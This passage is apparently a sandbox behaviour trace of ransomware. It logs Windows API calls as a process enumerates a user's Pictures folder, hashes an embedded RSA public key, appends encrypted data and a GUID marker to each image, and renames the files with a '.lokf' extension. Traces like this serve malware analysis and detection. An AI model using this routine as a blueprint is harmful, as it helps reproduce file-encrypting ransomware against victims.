lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.180] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.180] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.181] CloseHandle (hObject=0x5cc) returned 1 [0059.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.181] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lY0DCvr2.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ly0dcvr2.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lY0DCvr2.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ly0dcvr2.bmp.lokf")) returned 1 [0059.182] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb69c2b70, ftCreationTime.dwHighDateTime=0x1d4ccd7, ftLastAccessTime.dwLowDateTime=0x17ff2de0, ftLastAccessTime.dwHighDateTime=0x1d4d0e3, ftLastWriteTime.dwLowDateTime=0x17ff2de0, ftLastWriteTime.dwHighDateTime=0x1d4d0e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mjvWTIfK-ga.gif", cAlternateFileName="MJVWTI~1.GIF")) returned 1 [0059.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.183] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mjvWTIfK-ga.gif") returned=".gif" [0059.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mjvWTIfK-ga.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mjvwtifk-ga.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.183] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=23902) returned 1 [0059.183] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.185] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5d38, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.185] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.186] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x5d5e, lpOverlapped=0x0) returned 1 [0059.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.186] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.187] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.187] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.187] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.187] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.187] GetLastError () returned 0x0 [0059.187] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.187] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.187] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.187] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.187] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.187] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.188] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5d5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.188] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.188] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.188] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.188] CloseHandle (hObject=0x5cc) returned 1 [0059.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.189] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mjvWTIfK-ga.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mjvwtifk-ga.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mjvWTIfK-ga.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mjvwtifk-ga.gif.lokf")) returned 1 [0059.190] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94c82620, ftCreationTime.dwHighDateTime=0x1d4c5e3, ftLastAccessTime.dwLowDateTime=0x94bfa4c0, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0x94bfa4c0, ftLastWriteTime.dwHighDateTime=0x1d4c65e, nFileSizeHigh=0x0, nFileSizeLow=0x18d31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OkL4HKnkSYSJIwPNsR_.png", cAlternateFileName="OKL4HK~1.PNG")) returned 1 [0059.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.190] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OkL4HKnkSYSJIwPNsR_.png") returned=".png" [0059.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OkL4HKnkSYSJIwPNsR_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\okl4hknksysjiwpnsr_.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.190] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=101681) returned 1 [0059.190] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.193] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18d0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.193] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.194] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.194] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x18d31, lpOverlapped=0x0) returned 1 [0059.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.194] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.195] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.195] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.195] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.195] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.195] GetLastError () returned 0x0 [0059.195] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.195] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.195] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.195] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.196] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18d30) returned 0x9c83710 [0059.196] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83418 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4a8 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83460 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4c0 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4f0 [0059.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b508 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.197] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4f0 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b508 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b508 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b4f0 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b508 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4f0 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.197] GetCurrentThreadId () returned 0x9e0 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7e078 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.198] GetCurrentThreadId () returned 0x9e0 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4f0 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b508 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4d8 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 